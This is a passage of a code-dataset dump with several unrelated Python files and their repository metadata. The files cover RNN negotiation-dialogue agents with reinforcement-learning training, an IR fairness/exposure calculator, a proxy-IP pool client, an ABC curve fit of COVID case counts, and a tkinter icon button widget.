outcomes])\n if self.options.verbosity >= 5:\n print(f' --AVE_REWARD [{self.agent_id}]: {ave_reward} <= '\n f'{repr(candidate)}')\n if ave_reward > best_ave_reward:\n best_candidates = [candidate]\n best_ave_reward = ave_reward\n else:\n best_candidates.append(candidate)\n choice = best_candidates[rng.randint(len(best_candidates))]\n if self.options.verbosity >= 5:\n print(f' --CHOICE [{self.agent_id}]: {repr(choice)}')\n return choice\n\n def infer_their_rewards(self, game, dialogue):\n # Pick something feasible at random.\n possible = [r for r in all_possible_rewards(game[0])\n if not has_double_zeros(r, game[1])]\n return possible[rng.randint(len(possible))]\n\n def outcome(self, outcome):\n if self.options.verbosity >= 5:\n print(f\" --GAME [{self.agent_id}]: {self.game}\")\n\n\nclass RSAAgent(TwoModelAgent):\n def infer_their_rewards(self, game, dialogue):\n assert len(self.models) >= 3, \\\n 'Not enough models for RSA agent (need 3, got {})'.format(len(self.models))\n # Use model to sample possible other rewards\n inst = self.get_input_instance(game, dialogue)\n possible = [r for r in all_possible_rewards(game[0])\n if not has_double_zeros(r, game[1])]\n score_insts = [self.fill_score_instance(inst, r, game[0])\n for r in possible]\n pred_model = self.models[2]\n with thutils.device_context(pred_model.options.device):\n scores = pred_model.score(score_insts)\n probs = np.exp(np.array(scores) - logsumexp(scores))\n if self.options.verbosity >= 6:\n print([i.output for i in score_insts])\n print(scores)\n print(probs)\n return possible[rng.choice(np.arange(len(possible)),\n p=probs)]\n\n def fill_score_instance(self, inst, rewards, counts):\n inst_dict = inst.__dict__.copy()\n inst_dict['output'] = \\\n f'{counts[0]} {rewards[0]} {counts[1]} {rewards[1]} {counts[2]} {rewards[2]}'\n return Instance(**inst_dict)\n\n\nclass FBReproAgent(Agent):\n def start(self):\n self.negotiator = self.models[0].model.module\n self.vectorizer = self.models[0].model.vectorizer\n self.tokenize, self.detokenize = tokenizers.TOKENIZERS[self.models[0].options.tokenizer]\n with self.use_device():\n resp_vec = self.vectorizer.resp_vec\n self.eos = cu(th.LongTensor(resp_vec.vectorize([''])[0])[0])\n self.you = cu(th.LongTensor(resp_vec.vectorize(['YOU:'])[0])[0])\n self.them = cu(th.LongTensor(resp_vec.vectorize(['THEM:'])[0])[0])\n self.sel_token = cu(th.LongTensor(resp_vec.vectorize([''])[0])[0])\n\n def new_game(self, game):\n if not hasattr(self, 
'agent_id'):\n self.agent_id = random_agent_name()\n\n with self.use_device():\n goal_indices, self.feasible_sels, self.num_feasible_sels = self.vectorize_game(game)\n self.negotiator.context(goal_indices)\n self.game = game\n self.sel_singleton = [None]\n self.num_dialogue_turns = 0\n\n def vectorize_game(self, game):\n input_tokens = [str(e) for pair in zip(game[0], game[1]) for e in pair]\n partner_tokens = [str(e) for pair in zip(game[0], game[2]) for e in pair]\n (goal_indices, partner_,\n resp_, resp_len_,\n sel_, feasible_sels,\n num_feasible_sels) = self.vectorizer.vectorize((input_tokens,\n ['', ''],\n [''] * 3,\n partner_tokens))\n return (thutils.to_torch(goal_indices)[None, :],\n thutils.to_torch(feasible_sels)[None, :],\n thutils.to_torch(num_feasible_sels)[None, :])\n\n def act(self, goal_directed=False, both_sides=False,\n invert=False, dialogue=None, sel_singleton=None):\n if goal_directed or both_sides:\n raise NotImplementedError\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n with self.use_device():\n if sel_singleton[0] is not None or \\\n self.num_dialogue_turns >= self.options.max_dialogue_len:\n action = self.make_selection()\n else:\n output_predict, output_score = self.negotiator.speak(self.you, self.eos)\n (resp_indices, resp_len) = output_predict['sample']\n\n if is_selection(resp_indices, resp_len, self.sel_token):\n action = self.make_selection()\n else:\n action = self.vectorizer.resp_vec.unvectorize(thutils.to_numpy(resp_indices)[0],\n thutils.to_numpy(resp_len)[0])\n action = self.detokenize(action[1:])\n\n if self.options.verbosity >= 5:\n print(f' --ACT [{self.agent_id}]: {repr(action)}')\n return action\n\n def make_selection(self):\n empty_sel_indices = th.autograd.Variable(cu(th.LongTensor([0])))\n sel_predict, sel_score = self.negotiator.selection(empty_sel_indices,\n self.feasible_sels,\n self.num_feasible_sels)\n return parse_selection(' '.join(self.vectorizer.sel_vec.unvectorize(\n thutils.to_numpy(sel_predict['sample'])[0]\n )), self.game[0])\n\n def commit(self, action, dialogue=None, sel_singleton=None):\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(action, list):\n if sel_singleton[0] is not None:\n sel_singleton[0] = action\n return\n\n with self.use_device():\n resp_indices, resp_len = self.vectorize_response(action, self.you)\n self.negotiator.listen(resp_indices, resp_len)\n\n self.num_dialogue_turns += 1\n\n def observe(self, result, dialogue=None, sel_singleton=None):\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(result, list):\n if sel_singleton[0] is None:\n sel_singleton[0] = result\n result = ''\n else:\n return True\n\n if self.options.verbosity >= 5:\n print(f' --OBSERVE [{self.agent_id}]: {repr(result)}')\n\n with self.use_device():\n resp_indices, resp_len = self.vectorize_response(result, self.them)\n self.negotiator.listen(resp_indices, resp_len)\n\n self.num_dialogue_turns += 1\n return False\n\n def vectorize_response(self, response, you_them):\n tag = th.autograd.Variable(cu(th.LongTensor([[you_them]])))\n resp_indices, resp_len = self.vectorizer.resp_vec.vectorize(self.tokenize(response))\n tagged_resp_indices = th.cat([tag.expand(1, 1),\n thutils.to_torch(resp_indices)[None, :]], 1)\n return (tagged_resp_indices, thutils.to_torch(resp_len + 1))\n\n def use_device(self):\n return thutils.device_context(self.models[0].options.device)\n\n\ndef invert_proposal(response, game):\n return [c - s for c, s in zip(game[0], 
response)]\n\n\ndef parse_selection(line, counts):\n if line.startswith('<'):\n return []\n\n import re\n match = re.search(r'item0=(\\d+) item1=(\\d+) item2=(\\d+)', line)\n if not match:\n return []\n else:\n return [max(0, min(c, int(s))) for c, s in zip(counts, match.groups())]\n\n\ndef has_double_zeros(their_rewards, our_rewards):\n assert len(their_rewards) == len(our_rewards) == 3, (their_rewards, our_rewards)\n for t, o in zip(their_rewards, our_rewards):\n if t == 0 == o:\n return True\n return False\n\n\ndef compute_outcome(game, proposal_a, response_a):\n if response_a != proposal_a:\n return (DISAGREE, 0, 0), (DISAGREE, 0, 0)\n elif proposal_a == []:\n return (NO_AGREEMENT, 0, 0), (NO_AGREEMENT, 0, 0)\n else:\n value_a = sum([s * v for s, v in zip(proposal_a, game[1])])\n value_b = sum([(c - s) * v for c, s, v in zip(game[0], proposal_a, game[2])])\n return (AGREE, value_a, value_b), (AGREE, value_b, value_a)\n\n\nAGENTS = {\n c.__name__: c\n for c in [HumanAgent, TwoModelAgent, RSAAgent, RuleBasedAgent,\n FBReproAgent]\n}\n\n\nREWARDS_CACHE = {}\n\n\ndef all_possible_rewards(counts):\n counts = tuple(counts)\n if counts not in REWARDS_CACHE:\n possible = []\n for r1, r2, r3 in all_possible_subcounts([10, 10, 10]):\n if r1 * counts[0] + r2 * counts[1] + r3 * counts[2] == 10:\n possible.append((r1, r2, r3))\n REWARDS_CACHE[counts] = possible\n return REWARDS_CACHE[counts]\n\n\nclass Negotiator(th.nn.Module):\n def __init__(self, options,\n goal_vocab, resp_vocab, sel_vocab,\n delimiters,\n monitor_activations=True):\n super(Negotiator, self).__init__()\n self.monitor_activations = monitor_activations\n self.activations = neural.Activations()\n if monitor_activations:\n child_activations = self.activations\n else:\n child_activations = None\n\n self.h_init = th.nn.Linear(1, options.cell_size * options.num_layers, bias=False)\n self.c_init = th.nn.Linear(1, options.cell_size * options.num_layers, bias=False)\n\n self.context_encoder = seq2seq.RNNEncoder(src_vocab=goal_vocab,\n cell_size=options.cell_size,\n embed_size=options.embed_size,\n dropout=options.dropout,\n delimiters=delimiters[0],\n rnn_cell=options.rnn_cell,\n num_layers=options.num_layers,\n bidirectional=False,\n activations=child_activations)\n self.response_decoder = seq2seq.RNNDecoder(tgt_vocab=resp_vocab,\n cell_size=options.cell_size,\n embed_size=options.embed_size,\n dropout=options.dropout,\n delimiters=delimiters[1],\n rnn_cell=options.rnn_cell,\n num_layers=options.num_layers,\n beam_size=options.beam_size,\n extra_input_size=options.cell_size,\n max_len=options.max_length,\n activations=child_activations)\n self.response_encoder = seq2seq.RNNEncoder(src_vocab=resp_vocab,\n cell_size=options.cell_size,\n embed_size=options.embed_size,\n dropout=options.dropout,\n delimiters=delimiters[1],\n rnn_cell=options.rnn_cell,\n num_layers=options.num_layers,\n bidirectional=options.bidirectional,\n activations=child_activations)\n self.combined_layer = th.nn.Linear(options.cell_size * 2, options.cell_size, bias=False)\n self.selection_layer = th.nn.Linear(options.cell_size, sel_vocab, bias=False)\n\n def forward(self,\n goal_indices, partner_goal_indices_,\n resp_indices, resp_len,\n sel_indices, feasible_sels, num_feasible_sels):\n a = self.activations\n\n batch_size, goal_size = goal_indices.size()\n\n self.context(goal_indices)\n\n assert resp_indices.size()[0] == batch_size, resp_indices.size()\n response_predict, response_score = self.dialogue(resp_indices, resp_len)\n\n assert a.dialogue_repr.size()[0] == 
batch_size, (a.dialogue_repr.size(), batch_size)\n selection_predict, selection_score = self.selection(sel_indices, feasible_sels,\n num_feasible_sels)\n\n predict = {\n k: response_predict[k] + (selection_predict[k],)\n for k in response_predict\n }\n score = (response_score, selection_score)\n return predict, score\n\n def context(self, goal_indices):\n # \"GRU_g\": encode goals (values of items)\n a = self.activations\n\n batch_size, goal_size = goal_indices.size()\n assert goal_size == GOAL_SIZE, goal_indices.size()\n\n goal_len = th.autograd.Variable(cu(\n (th.ones(batch_size) * goal_size).int()\n ))\n assert goal_len.size() == (batch_size,), goal_len.size()\n\n a.context_repr_seq, _ = self.context_encoder(goal_indices, goal_len)\n assert a.context_repr_seq.dim() == 3, a.context_repr_seq.size()\n assert a.context_repr_seq.size()[:2] == (batch_size, goal_size), a.context_repr_seq.size()\n\n a.context_repr = a.context_repr_seq[:, -1, :]\n context_repr_size = a.context_repr_seq.size()[2]\n assert a.context_repr.size() == (batch_size, context_repr_size), a.context_repr.size()\n\n self.dec_state = seq2seq.generate_rnn_state(self.response_encoder,\n self.h_init, self.c_init, batch_size)\n if not isinstance(self.dec_state, tuple):\n self.dec_state = (self.dec_state,)\n\n def dialogue(self, resp_indices, resp_len, persist=True, predict=True, eos_token=None):\n # \"GRU_w\": encode and produce dialogue\n a = self.activations\n\n assert resp_indices.dim() == 2, resp_indices.size()\n batch_size, max_resp_len = resp_indices.size()\n\n dec_state_concat = tuple(self.response_encoder.concat_directions(c) for c in self.dec_state)\n response_predict, response_score, response_output = self.response_decoder(\n dec_state_concat,\n resp_indices, resp_len,\n extra_inputs=[a.context_repr],\n extra_delimiter=eos_token,\n output_beam=predict, output_sample=predict\n )\n (dialogue_repr_seq, dec_state) = response_output['target']\n if persist:\n '''\n if hasattr(a, 'dialogue_repr_seq'):\n print((resp_indices[0, :20], resp_len[0]))\n print(f' {self.dec_state[0].data[0, 0, 0]:.4f} -> '\n f' {dec_state[0].data[0, 0, 0]:.4f}')\n print(f' {a.dialogue_repr_seq.data[0, 0, 0]:.4f} -> '\n f' {dialogue_repr_seq.data[0, 0, 0]:.4f}')\n '''\n a.dialogue_repr_seq, self.dec_state = dialogue_repr_seq, dec_state\n assert dialogue_repr_seq.dim() == 3, dialogue_repr_seq.size()\n assert dialogue_repr_seq.size()[:2] == (batch_size, max_resp_len - 1), \\\n (dialogue_repr_seq.size(), (batch_size, max_resp_len - 1))\n dialogue_repr_size = dialogue_repr_seq.size()[2]\n\n dialogue_repr = index_sequence(dialogue_repr_seq.transpose(1, 2),\n th.clamp(resp_len.data, max=max_resp_len - 2)[:, None])\n if persist:\n a.dialogue_repr = dialogue_repr\n assert dialogue_repr.dim() == 2, dialogue_repr.size()\n assert dialogue_repr.size() == (batch_size, dialogue_repr_size), \\\n (dialogue_repr.size(), (batch_size, dialogue_repr_size))\n\n return response_predict, response_score\n\n def selection(self, sel_indices, feasible_sels, num_feasible_sels):\n # \"GRU_o\": encode dialogue for selection\n a = self.activations\n\n assert sel_indices.dim() == 1, sel_indices.size()\n batch_size = sel_indices.size()[0]\n\n a.combined_repr = self.combined_layer(th.cat([a.context_repr, a.dialogue_repr],\n dim=1))\n assert a.combined_repr.dim() == 2, a.combined_repr.size()\n assert a.combined_repr.size()[0] == batch_size, (a.combined_repr.size(), batch_size)\n\n a.all_item_scores = log_softmax(self.selection_layer(a.combined_repr))\n assert a.all_item_scores.size() == 
(batch_size, self.selection_layer.out_features), \\\n (a.all_item_scores.size(), (batch_size, self.selection_layer.out_features))\n\n a.feasible_item_scores = a.all_item_scores[\n lrange(a.all_item_scores.size()[0])[:, None, None],\n feasible_sels.data\n ]\n assert a.feasible_item_scores.size() == (batch_size, MAX_FEASIBLE + 3, NUM_ITEMS), \\\n (a.feasible_item_scores.size(), batch_size)\n\n num_feasible_mask = th.autograd.Variable(cu(\n (lrange(a.feasible_item_scores.size()[1])[None, :, None] <=\n num_feasible_sels.data[:, None, None]).float()\n ))\n a.feasible_masked = a.feasible_item_scores + th.log(num_feasible_mask)\n a.full_selection_scores = log_softmax(a.feasible_item_scores.sum(dim=2), dim=1)\n assert a.full_selection_scores.size() == (batch_size, MAX_FEASIBLE + 3), \\\n (a.full_selection_scores.size(), batch_size)\n\n a.selection_beam_score, selection_beam = a.full_selection_scores.max(dim=1)\n assert selection_beam.size() == (batch_size,), (selection_beam.size(), batch_size)\n selection_sample = th.multinomial(th.exp(a.full_selection_scores),\n 1, replacement=True)[:, 0]\n a.selection_sample_score = th.exp(a.full_selection_scores)[\n lrange(a.full_selection_scores.size()[0]),\n selection_sample.data\n ]\n assert selection_sample.size() == (batch_size,), (selection_sample.size(), batch_size)\n selection_predict = {\n 'beam': self.sel_indices_to_selection(feasible_sels, selection_beam),\n 'sample': self.sel_indices_to_selection(feasible_sels, selection_sample),\n }\n assert selection_predict['beam'].size() == (batch_size, NUM_ITEMS), \\\n (selection_predict['beam'].size(), batch_size)\n assert selection_predict['sample'].size() == (batch_size, NUM_ITEMS), \\\n (selection_predict['sample'].size(), batch_size)\n a.selection_target_score = a.full_selection_scores[\n lrange(a.full_selection_scores.size()[0]),\n sel_indices.data\n ]\n assert a.selection_target_score.size() == (batch_size,), (a.selection_score.size(),\n batch_size)\n selection_score = {\n 'target': a.selection_target_score,\n 'beam': a.selection_beam_score,\n 'sample': a.selection_sample_score,\n }\n\n return selection_predict, selection_score\n\n def sel_indices_to_selection(self, feasible_sels, sel_indices):\n return feasible_sels[lrange(feasible_sels.size()[0]), sel_indices.data, :]\n\n def speak(self, you_token, eos_token=None):\n empty_resp_indices = th.autograd.Variable(cu(th.LongTensor([[0, 1]])))\n empty_resp_len = th.autograd.Variable(cu(th.LongTensor([2])))\n response_predict, response_score = self.dialogue(empty_resp_indices, empty_resp_len,\n persist=False, eos_token=eos_token)\n del response_score['target']\n return response_predict, response_score\n\n def listen(self, resp_indices, resp_len):\n seq2seq.RNNDecoder.debug = 'a'\n self.dialogue(resp_indices, resp_len, predict=False)\n del seq2seq.RNNDecoder.debug\n\n\nclass SupervisedLoss(th.nn.Module):\n def __init__(self, options):\n super(SupervisedLoss, self).__init__()\n self.alpha = options.selection_alpha\n\n def forward(self, predict, score):\n response_score, selection_score = score\n return -response_score['target'].mean() - self.alpha * selection_score['target'].mean()\n\n\nclass RLLoss(th.nn.Module):\n def __init__(self, options):\n super(RLLoss, self).__init__()\n self.reward_history = []\n self.gamma = options.rl_gamma\n\n def forward(self, predict, score):\n dialogue, sel_a, sel_b, reward, partner_reward = predict\n response_scores, selection_score = score\n\n reward_transformed = self.transform_reward(reward)\n step_rewards = []\n discount = 
th.autograd.Variable(cu(th.FloatTensor([1.0])))\n for i in range(len(response_scores)):\n step_rewards.append(discount * reward_transformed)\n discount = discount * self.gamma\n\n loss = th.autograd.Variable(cu(th.FloatTensor([0.0])))\n for score, step_reward in zip(response_scores, step_rewards):\n loss -= score * step_reward\n\n return loss\n\n def transform_reward(self, reward):\n self.reward_history.append(reward)\n mu = np.mean(self.reward_history)\n sigma = max(1.0, np.std(self.reward_history))\n return (reward - mu) / sigma\n\n\nclass RLNegotiator(th.nn.Module):\n def __init__(self, negotiator, partner, vectorizer, options):\n super(RLNegotiator, self).__init__()\n self.negotiator = negotiator\n self.partner = partner\n self.vectorizer = vectorizer\n self.eos = cu(th.LongTensor(self.vectorizer.resp_vec.vectorize([''])[0])[0])\n self.you = cu(th.LongTensor(self.vectorizer.resp_vec.vectorize(['YOU:'])[0])[0])\n # needed by the is_selection check in forward(); mirrors FBReproAgent.start\n self.sel_token = cu(th.LongTensor(self.vectorizer.resp_vec.vectorize([''])[0])[0])\n\n self.epsilon = options.rl_epsilon\n self.max_dialogue_len = options.max_dialogue_len\n\n def forward(self,\n goal_indices, partner_goal_indices,\n resp_indices_, resp_len_,\n sel_indices_, feasible_sels, num_feasible_sels):\n num_feasible_sels = th.autograd.Variable(cu(th.LongTensor(\n [feasible_sels.size()[1]]\n )))\n\n self.negotiator.context(goal_indices)\n self.partner.context(goal_indices)\n\n my_turn = rng.choice([True, False])\n dialogue = []\n policy_scores = []\n for _ in range(self.max_dialogue_len):\n me = self.negotiator if my_turn else self.partner\n other = self.partner if my_turn else self.negotiator\n\n output_predict, output_score = me.speak(self.you, self.eos)\n (me_resp_indices, resp_len), policy_score = self.policy(output_predict, output_score)\n start_with_you = th.autograd.Variable(cu(th.LongTensor([[self.you]])))\n me_resp_indices = th.cat([start_with_you.expand(resp_len.size()[0], 1),\n me_resp_indices], 1)\n me.listen(me_resp_indices, resp_len + 1)\n\n other_resp_indices = self.transform_dialogue(me_resp_indices)\n other.listen(other_resp_indices, resp_len + 1)\n\n dialogue.append(((me_resp_indices if my_turn else other_resp_indices), resp_len))\n policy_scores.append(policy_score)\n if is_selection(me_resp_indices, resp_len, self.sel_token):\n break\n\n my_turn = not my_turn\n\n empty_sel_indices = th.autograd.Variable(cu(th.LongTensor([0])))\n # TODO: epsilon-greedy here too?\n selection_predict, selection_score = self.negotiator.selection(empty_sel_indices,\n feasible_sels,\n num_feasible_sels)\n sel_a = selection_predict['beam']\n sel_b = self.partner.selection(empty_sel_indices,\n feasible_sels, num_feasible_sels)[0]['beam']\n\n reward = compute_reward(sel_a, sel_b, goal_indices)\n partner_reward = compute_reward(sel_b, sel_a, partner_goal_indices)\n\n result = (dialogue, sel_a, sel_b, reward, partner_reward)\n return {'sample': result, 'beam': result}, (th.stack(policy_scores, 0)[:, 0],\n selection_score)\n\n def policy(self, output_predict, output_score):\n if rng.random_sample() <= self.epsilon:\n return output_predict['sample'], output_score['sample']\n else:\n return output_predict['beam'], th.autograd.Variable(cu(th.FloatTensor([0.0])))\n # output_score['beam']\n\n def transform_dialogue(self, resp_indices):\n you, them = th.LongTensor(self.vectorizer.resp_vec.vectorize(['YOU:', 'THEM:'])[0][:2])\n you_mask = (resp_indices == you)\n them_mask = (resp_indices == them)\n transformed = resp_indices.clone()\n transformed[you_mask.data] = them\n transformed[them_mask.data] = you\n return transformed\n\n\ndef is_selection(resp_indices, resp_len, sel_token):\n 
return resp_indices.data[0, 0] == sel_token and resp_len.data[0] == 1\n\n\ndef compute_reward(sel, other_sel, goal_indices):\n assert goal_indices.size()[1] == NUM_ITEMS * 2, goal_indices.size()\n counts = goal_indices[:, cu(th.LongTensor(range(0, NUM_ITEMS * 2, 2)))]\n values = goal_indices[:, cu(th.LongTensor(range(1, NUM_ITEMS * 2, 2)))]\n total_claimed = sel + other_sel\n # feasible = (total_claimed >= 0).prod() * (total_claimed <= counts).prod()\n feasible = (total_claimed == counts).prod().long()\n\n return ((values * sel).sum(1) * feasible).float()\n","repo_name":"futurulus/negotiation","sub_path":"agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":37242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26077720077","text":"import numpy as np\nimport general as gen\n# import clsRetrievabilityCalculator as rc\n\n\ndef calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation):\n\n exposure_result = {}\n exposure_count = {}\n fairness_result = {}\n faieness_val_index = 'rel_sum rel_count'.split().index(fairness_field) + 1\n for docid , val in dict_corpus.items():\n # Get author\n group = val[0]\n # Assign Exposure\n r = dict_ret[docid]\n exposure_result = gen.setVaue(exposure_result,group,r)\n if (exposure_operation == 'mean'):\n exposure_count = gen.setVaue(exposure_count,group,1)\n # Assign Fairness\n if (fairness_operation != 'equal'):\n r = val[faieness_val_index] if (fairness_operation == 'sum') else 1\n fairness_result = gen.setVaue(fairness_result,group,r)\n\n # Exposure\n values = list(exposure_result.values())\n if (exposure_operation == 'mean'):\n values = np.divide(values , list(exposure_count.values()))\n exposure = compute_percent(values)\n\n # Fairness\n values = [1] * len(values) if (fairness_operation == 'equal') else list(fairness_result.values())\n fairness = compute_percent(values)\n result = compute_fairness_score(fairness,exposure)\n return result\n\ndef compute_percent(v):\n total_v = np.sum(v)\n percent_v = np.divide(v , total_v)\n return percent_v\n\ndef compute_fairness_score(a, b):\n c = np.subtract(a,b) # substract\n c = np.power(c,2) # square\n c = np.sum(c) # sum\n score = np.power(c, 0.5) #square root\n return score\n\n\ndef get_fairness_scores(dict_corpus,dict_ret):\n '''\n Calculate Exposure_g\n \tFor each group calculate the sum of the r(d) values\n Then workout the proportion of r(d) for each group g. = Exposure_g\n '''\n\n '''\n Calculate Rel_count_g\n \tFor each group, calculate the count of the #rels for each \n \tgroup g, = Rel_count_g = sum of rel counts for group / total rel count over the collection\n '''\n exposure_operation = ''\n # agg = {rField:'sum' , 'rel_count':'sum'}\n # print('Begin F(Relevance)')\n # fairness_field = 'rel_count'\n # fairness_operation = 'sum'\n # rel_count_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n '''\n Calculate Rel_g\n \tFor each group, calculate the sum of the #rels for each \n \tgroup g, = Rel_g = sum of rels for group / total rels over the collection\n '''\n # 1 Fairness(Relevance)\n # print('Begin F(Relevance)')\n fairness_field = 'rel_sum'\n fairness_operation = 'sum'\n rel_sum_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n '''\n Calculate Size_g \n For each group, calculate the total group member - \n i.e. 
the number of documents in the group = Size_g\n '''\n # print('Begin F(Group)')\n # Fairness(Group)\n fairness_field = 'rel_count'\n fairness_operation = 'count'\n size_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n '''\n Calculate Group_g\n - [GROUPs] ALL GROUPS ARE EQUAL\n For each group, Group_g = 1/(Number of groups). \n '''\n # Fairness(Equality)\n # print('Begin F(Equality)')\n fairness_field = 'rel_count'\n fairness_operation = 'equal'\n grp_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n # print('Begin F(Exposure Mean Over Relevance)')\n exposure_operation = 'mean'\n fairness_field = 'rel_sum'\n fairness_operation = 'sum'\n rel_avg_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n\n # rel_sum_exposure,size_exposure,grp_exposure,rel_avg_exposure\n result = [ str(x) for x in [rel_sum_exposure,size_exposure,grp_exposure,rel_avg_exposure]]\n return result\n\ndef get_ret_dict (res_file,b,dict_corpus):\n # Get Document MAP [docid - r]\n\n # df = rc.getRetDf(res_file,b,corpus)\n # dict = df.to_dict('records')\n # return dict\n dict_ret = {}.fromkeys(dict_corpus.keys(),0)\n resF = open(res_file, 'r', encoding='utf-8')\n for line in resF:\n # print(line)\n parts = line.split()\n # qryid = parts[0]\n docid = parts[2]\n rank = int(parts[3])\n r = rank ** -b\n dict_ret[docid] += r\n resF.close()\n return dict_ret\n\n\ndef get_corpus_dict(corpus_file,group):\n # Return MAP [docid - {author,rel_sum,rel_count} ]\n\n f = open(corpus_file,encoding='utf-8')\n # Skip header\n line = f.readline()\n parts = line.replace('\\n','').split(',')\n groupIndex = parts.index(group)\n # Extract Rel_Sum and rel_count fields\n val_slice = [groupIndex,len(parts)-3 , len(parts) - 2]\n result = {}\n # docid,author,pubDate,kicker,byLine,rel_sum,rel_count,length\n for line in f:\n parts = line.split(',')\n key = parts[0]\n val = [parts[index] for index in val_slice]\n result[key] = val\n f.close()\n return result\n\ndef calculate (res_file , group , corpus,b):\n corpus = gen.getCorpus(corpus)\n corpus_file = gen.get_corpus_filename(corpus)\n # MAP [docid - {author - rel_sum - rel_count }\n dict_corpus = get_corpus_dict(corpus_file,group)\n # MAP [docid - r]\n dict_ret = get_ret_dict(res_file,b,dict_corpus)\n line = get_fairness_scores(dict_corpus,dict_ret)\n # Output : rel_sum_exposure,size_exposure,grp_exposure,rel_avg_exposure\n return line\n\n\ndef main():\n res_file = r'C:\\Users\\kkb19103\\Desktop\\test\\WA-BM25-100-200K-baseline.res'\n t1 = gen.getCurrentTime()\n calculate(res_file,'author','w',0.5)\n t2 = gen.getCurrentTime()\n print(t2 - t1)\nif __name__ == '__main__':\n main()","repo_name":"ABDULAZIZALQATAN/IR-Measurements","sub_path":"src/fairnessCalculator.py","file_name":"fairnessCalculator.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43798380284","text":"import json\nimport logging\nimport random\nfrom time import sleep\n\nimport requests\nfrom proxy_pool.ip_pool import ReachMaxException\n\nfrom proxy_pool import IpPool\n\nREQUEST_SUCCESS = 0\nREQUEST_TOO_QUICK = 1\nREQUEST_REACH_MAX = 2\n\n\nclass XunProxy(IpPool):\n def __init__(self, api_url, max_count=5):\n super().__init__(api_url, max_count)\n\n def start(self):\n self._update_ip()\n\n def _request_ip(self):\n res = self.sess.get(self.api_url).content.decode() # 
request new proxy IPs\n res = json.loads(res) # parse into a dict\n if res['ERRORCODE'] == \"0\":\n with self.cond:\n logging.info(\"requesting new proxy IPs\")\n ip_port_list = res['RESULT']\n self.ip_pool = set([f\"{ll['ip']}:{ll['port']}\" for ll in ip_port_list])\n self.cond.notify_all()\n logging.info(\"request finished\")\n return REQUEST_SUCCESS\n elif res['ERRORCODE'] in [\"10036\", \"10038\", \"10055\"]:\n logging.info(\"extraction frequency too high\")\n return REQUEST_TOO_QUICK\n elif res[\"ERRORCODE\"] == \"10032\":\n logging.info(\"request limit reached!!\")\n return REQUEST_REACH_MAX\n","repo_name":"ggqshr/proxy_pool","sub_path":"proxy_pool/xun_proxy.py","file_name":"xun_proxy.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"41701132598","text":"\"\"\" This code is taken from https://github.com/xl0418/ABCer/blob/master/Multiple_virusmodels.py \"\"\"\n\nfrom ABCer import ABCer\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef model4(para, time_survey=np.arange(18)):\n # time_survey = np.arange(18)\n y = para[0] * time_survey**3 + para[1] * time_survey**2 + para[2] * time_survey + para[3]\n return y\n\n\nobservations = np.array([\n 1.0, 7.0, 10.0, 24.0, 38.0, 82.0, 128.0, 188.0, 265.0, 321.0, 382.0, 503.0,\n 614.0, 804.0, 959.0, 1135.0, 1413.0, 1705.0\n])\ntime = np.arange(len(observations))\n\ntest_ABC4 = ABCer(50, 10000, observations=observations)\ntest_ABC4.initialize_model(model4)\ntest_ABC4.initialize_parameters([0.0, 1.0, 1.0, 1.0])\ntest_list4 = test_ABC4.ABC(prior_paras=[0.0, 2.0, 1.0, 2.0, 1.0, 2.0, 1.0, 2.0])\n\nplt.plot(time, observations, 'o')\npara_inferred = []\npara_inferred.append(np.mean(test_list4[0][20, :]))\npara_inferred.append(np.mean(test_list4[1][20, :]))\npara_inferred.append(np.mean(test_list4[2][20, :]))\npara_inferred.append(np.mean(test_list4[3][20, :]))\n\nextend_time = np.arange(18)\ny_inferred = model4(para_inferred, np.arange(18))\n\nplt.plot(extend_time, y_inferred, 'x', color='r')\n\nplt.show()","repo_name":"ParkLabML/ABCDP","sub_path":"abcdp/auxiliary_files/COVID_Prediction.py","file_name":"COVID_Prediction.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"9484662208","text":"import tkinter as tk\nfrom tkinter import *\nimport time\nfrom PIL import Image, ImageTk\nimport numpy as np\nimport os\nimport ColorClass\n\nclass IconButton(Frame):\n def __init__(self, parent=None, image=None, fillcolor=None, hovercolor=None, foreground=None, hoverforeground=None, bordercolor=None, activebordercolor=None, text=None, imagedata=None):\n \n if imagedata ==None: \n self.iconPIL = Image.open(image)\n self.icon = ImageTk.PhotoImage(self.iconPIL)\n else:\n self.icon = PhotoImage(data = imagedata)\n Frame.__init__(self, parent)\n self.config(cursor=\"hand2\")\n self.colors2=ColorClass.Midnight()\n self.fillcolor = fillcolor\n self.hovercolor=hovercolor\n self.foreground=foreground\n self.hoverforeground = hoverforeground\n self.bordercolor=bordercolor\n self.activebordercolor=activebordercolor\n self.parent=parent\n self.text=text\n self.config(highlightbackground=self.bordercolor, highlightcolor=self.bordercolor, bg=self.fillcolor)\n self.label = Label(self, relief=FLAT)\n self.label.config(image = self.icon, bg = self.fillcolor, compound = 'left', foreground = self.foreground, wraplength=71, justify=CENTER, text=self.text, font=(\"Segoe UI\", 12, 'roman'))\n self.label.grid(row=1, column=1, sticky='nsew')\n self.bind('<Enter>', 
